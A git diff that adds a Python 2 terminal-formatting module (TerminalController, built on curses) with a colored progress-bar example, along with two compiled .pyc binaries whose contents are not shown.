diff --git a/src/socks.pyc b/src/socks.pyc Binary files differnew file mode 100644 index 0000000..e68615f --- /dev/null +++ b/src/socks.pyc diff --git a/src/terminal.py b/src/terminal.py new file mode 100644 index 0000000..2c43750 --- /dev/null +++ b/src/terminal.py @@ -0,0 +1,185 @@ +import sys, re + +class TerminalController: + """ + A class that can be used to portably generate formatted output to + a terminal. + + `TerminalController` defines a set of instance variables whose + values are initialized to the control sequence necessary to + perform a given action. These can be simply included in normal + output to the terminal: + + >>> term = TerminalController() + >>> print 'This is '+term.GREEN+'green'+term.NORMAL + + Alternatively, the `render()` method can used, which replaces + '${action}' with the string required to perform 'action': + + >>> term = TerminalController() + >>> print term.render('This is ${GREEN}green${NORMAL}') + + If the terminal doesn't support a given action, then the value of + the corresponding instance variable will be set to ''. As a + result, the above code will still work on terminals that do not + support color, except that their output will not be colored. + Also, this means that you can test whether the terminal supports a + given action by simply testing the truth value of the + corresponding instance variable: + + >>> term = TerminalController() + >>> if term.CLEAR_SCREEN: + ... print 'This terminal supports clearning the screen.' + + Finally, if the width and height of the terminal are known, then + they will be stored in the `COLS` and `LINES` attributes. + """ + # Cursor movement: + BOL = '' #: Move the cursor to the beginning of the line + UP = '' #: Move the cursor up one line + DOWN = '' #: Move the cursor down one line + LEFT = '' #: Move the cursor left one char + RIGHT = '' #: Move the cursor right one char + + # Deletion: + CLEAR_SCREEN = '' #: Clear the screen and move to home position + CLEAR_EOL = '' #: Clear to the end of the line. + CLEAR_BOL = '' #: Clear to the beginning of the line. + CLEAR_EOS = '' #: Clear to the end of the screen + + # Output modes: + BOLD = '' #: Turn on bold mode + BLINK = '' #: Turn on blink mode + DIM = '' #: Turn on half-bright mode + REVERSE = '' #: Turn on reverse-video mode + NORMAL = '' #: Turn off all modes + + # Cursor display: + HIDE_CURSOR = '' #: Make the cursor invisible + SHOW_CURSOR = '' #: Make the cursor visible + + # Terminal size: + COLS = None #: Width of the terminal (None for unknown) + LINES = None #: Height of the terminal (None for unknown) + + # Foreground colors: + BLACK = BLUE = GREEN = CYAN = RED = MAGENTA = YELLOW = WHITE = '' + + # Background colors: + BG_BLACK = BG_BLUE = BG_GREEN = BG_CYAN = '' + BG_RED = BG_MAGENTA = BG_YELLOW = BG_WHITE = '' + + _STRING_CAPABILITIES = """ + BOL=cr UP=cuu1 DOWN=cud1 LEFT=cub1 RIGHT=cuf1 + CLEAR_SCREEN=clear CLEAR_EOL=el CLEAR_BOL=el1 CLEAR_EOS=ed BOLD=bold + BLINK=blink DIM=dim REVERSE=rev UNDERLINE=smul NORMAL=sgr0 + HIDE_CURSOR=cinvis SHOW_CURSOR=cnorm""".split() + _COLORS = """BLACK BLUE GREEN CYAN RED MAGENTA YELLOW WHITE""".split() + + def __init__(self, term_stream=sys.stdout): + """ + Create a `TerminalController` and initialize its attributes + with appropriate values for the current terminal. + `term_stream` is the stream that will be used for terminal + output; if this stream is not a tty, then the terminal is + assumed to be a dumb terminal (i.e., have no capabilities). + """ + # Curses isn't available on all platforms + try: import curses + except: return + + # If the stream isn't a tty, then assume it has no capabilities. + if not term_stream.isatty(): return + + # Check the terminal type. If we fail, then assume that the + # terminal has no capabilities. + try: curses.setupterm() + except: return + + # Look up numeric capabilities. + self.COLS = curses.tigetnum('cols') + self.LINES = curses.tigetnum('lines') + + # Look up string capabilities. + for capability in self._STRING_CAPABILITIES: + (attrib, cap_name) = capability.split('=') + setattr(self, attrib, self._tigetstr(cap_name) or '') + + # Colors + set_fg = self._tigetstr('setf') + if set_fg: + for i,color in zip(range(len(self._COLORS)), self._COLORS): + setattr(self, color, curses.tparm(set_fg, i) or '') + set_bg = self._tigetstr('setb') + if set_bg: + for i,color in zip(range(len(self._COLORS)), self._COLORS): + setattr(self, 'BG_'+color, curses.tparm(set_bg, i) or '') + + def _tigetstr(self, cap_name): + # String capabilities can include "delays" of the form "$<2>". + # For any modern terminal, we should be able to just ignore + # these, so strip them out. + import curses + cap = curses.tigetstr(cap_name) or '' + return re.sub(r'\$<\d+>[/*]?', '', cap) + + def render(self, template): + """ + Replace each $-substitutions in the given template string with + the corresponding terminal control string (if it's defined) or + '' (if it's not). + """ + return re.sub(r'\$\$|\${\w+}', self._render_sub, template) + + def _render_sub(self, match): + s = match.group() + if s == '$$': return s + else: return getattr(self, s[2:-1]) + +####################################################################### +# Example use case: progress bar +####################################################################### + +class ProgressBar: + """ + A 3-line progress bar, which looks like:: + + Header + 20% [===========----------------------------------] + progress message + + The progress bar is colored, if the terminal supports color + output; and adjusts to the width of the terminal. + """ + BAR = '%3d%% ${GREEN}[${BOLD}%s%s${NORMAL}${GREEN}]${NORMAL}\n' + HEADER = '${BOLD}${CYAN}%s${NORMAL}\n\n' + + def __init__(self, term, header): + self.term = term + if not (self.term.CLEAR_EOL and self.term.UP and self.term.BOL): + raise ValueError("Terminal isn't capable enough -- you " + "should use a simpler progress dispaly.") + self.width = self.term.COLS or 75 + self.bar = term.render(self.BAR) + self.header = self.term.render(self.HEADER % header.center(self.width)) + self.cleared = 1 #: true if we haven't drawn the bar yet. + self.update(0, '') + + def update(self, percent, message): + if self.cleared: + sys.stdout.write(self.header) + self.cleared = 0 + n = int((self.width-10)*percent) + sys.stdout.write( + self.term.BOL + self.term.UP + self.term.CLEAR_EOL + + (self.bar % (100*percent, '='*n, '-'*(self.width-10-n))) + + self.term.CLEAR_EOL + message.center(self.width)) + + def clear(self): + if not self.cleared: + sys.stdout.write(self.term.BOL + self.term.CLEAR_EOL + + self.term.UP + self.term.CLEAR_EOL + + self.term.UP + self.term.CLEAR_EOL) + self.cleared = 1 + + diff --git a/src/terminal.pyc b/src/terminal.pyc Binary files differnew file mode 100644 index 0000000..fe4c802 --- /dev/null +++ b/src/terminal.pyc |